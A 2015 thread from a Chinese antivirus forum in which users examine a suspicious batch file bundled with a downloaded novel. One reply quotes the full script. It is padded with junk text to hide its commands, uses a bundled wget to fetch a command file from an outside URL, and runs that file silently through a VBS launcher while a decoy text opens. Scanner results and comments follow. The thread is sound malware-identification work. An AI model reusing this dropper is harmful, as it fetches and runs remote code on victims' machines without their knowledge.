12
返回列表 发新帖
楼主: 摆摊卖西瓜
收起左侧

[可疑文件] 新编辑,带多一个批处理,下载小说附带的一个隐藏可执行文件,求鉴定

[复制链接]
ytysh
发表于 2015-6-14 12:35:32 | 显示全部楼层
本帖最后由 ytysh 于 2015-6-14 12:38 编辑

BAT的内容很诡异
%%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a  
cls
@echo off
if exist %TEMP%\tmp.cmd del /s /q %TEMP%\tmp.cmd
if exist %TEMP%\tmp.vbs del /s /q %TEMP%\tmp.vbs
if exist %TEMP%\wget.exe del /s /q %TEMP%\wget.exe
ATTRIB -R -A -S -H books\wget.exe /S /D
ping 127.0.0.1 1>nul
move /Y books\wget.exe %TEMP%\wget.exe
ping 127.0.0.1 1>nul
%temp%\wget.exe -q -O %temp%\tmp.cmd http://cq.xdf.la/dl1.txt
ping 127.0.0.1 1>nul
echo Set ws = CreateObject("Wscript.Shell")>>%TEMP%\tmp.vbs
echo ws.run "cmd /c if exist %TEMP%\tmp (echo y|cacls %TEMP%\tmp /p everyone:f >nul 2>nul &&rd /s /q %TEMP%\tmp)",vbhide>>%TEMP%\tmp.vbs
echo ws.run "cmd /c %TEMP%\tmp.cmd",vbhide>>%TEMP%\tmp.vbs
ping 127.0.0.1 1>nul
start books\xiaoshuo.txt
start %TEMP%\tmp.vbs
exit

小红伞提示Under Analysis

We received the following archive files:

File ID        Filename        Size (Byte)        Result
28539287        books.zip        385.84 KB        OK
A listing of files contained inside archives alongside their results can be found below:

File ID        Filename        Size (Byte)        Result
28539288        book.bat        1.2 KB        UNDER ANALYSIS
28539289        xiaoshuo.txt        34 Byte        UNDER ANALYSIS
22465467        wget.exe        392 KB        KNOWN CLEAN

Please find a detailed report concerning each individual sample below:

Filename        Result
book.bat        UNDER ANALYSIS

The file 'book.bat' has been determined to be 'UNDER ANALYSIS'.
Filename        Result
xiaoshuo.txt        UNDER ANALYSIS

The file 'xiaoshuo.txt' has been determined to be 'UNDER ANALYSIS'.
Filename        Result
wget.exe        KNOWN CLEAN

The file 'wget.exe' has been determined to be 'KNOWN CLEAN'. In particular this means that we could not find any malicious content. Please note that the file is part of 'NULL'.
EnZhSTReLniKoVa
发表于 2015-6-14 15:02:04 | 显示全部楼层
BD 扫描MSS
2221000789
发表于 2015-6-14 16:31:34 | 显示全部楼层
趋势科技  MISS
paul_guo
发表于 2015-6-14 17:51:27 | 显示全部楼层
WGET是个CMD调用的下载器。。。。。白文件的
摆摊卖西瓜
 楼主| 发表于 2015-6-17 17:52:01 | 显示全部楼层
paul_guo 发表于 2015-6-14 17:51
WGET是个CMD调用的下载器。。。。。白文件的

下载器是白文件。下载的东西呢、。。。
paul_guo
发表于 2015-6-17 17:54:38 | 显示全部楼层
摆摊卖西瓜 发表于 2015-6-17 17:52
下载器是白文件。下载的东西呢、。。。

这我就不清楚了
摆摊卖西瓜
 楼主| 发表于 2015-6-17 18:00:58 | 显示全部楼层

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-23 14:06 , Processed in 0.083287 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表